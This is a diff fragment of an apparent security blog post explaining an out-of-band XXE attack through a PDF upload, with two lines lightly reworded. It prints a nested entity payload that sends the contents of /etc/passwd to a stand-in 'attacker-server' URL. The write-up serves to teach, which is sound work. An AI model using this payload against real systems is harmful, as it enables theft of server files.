saurinn/saurinn.github.com/src/pages/blog/xxe-oob-via-a-pdf-upload.md

 4. `<!ENTITY % ent "<!ENTITY data SYSTEM 'https://attacker-server/?x=%file;'>">`: This is a nested entity.
 It defines a parameter entity %ent, whose value is the full declaration for a general entity named <b>data</b>.
 This part is key because it ensures the file content (%file) is read and included within the URL of the final call.

-Back in the initial payload:
+Back to the 1st. payload:

-5. `%ent;`: This line (3rd) triggers the processing of the %ent entity from the remote DTD, in simple terms, this action brings the final, exfil command (&data;) into play, setting up the last step of the attack.
+5. `%ent;`: This line (#3) triggers the processing of the %ent entity from the remote DTD, in simple terms, this action brings the final, exfil command (&data;) into play, setting up the last step of the attack.

 6. `<root>&data;</root>`: The parser now resolves the `&data;` general entity.
 This triggers a final HTTP request to `https://attacker-server`.
 The content of the `/etc/passwd` file is appended as a URL parameter (`?x=%file;`), and the server sends this request successfully exfiltrating the data to the attacker's controlled domain.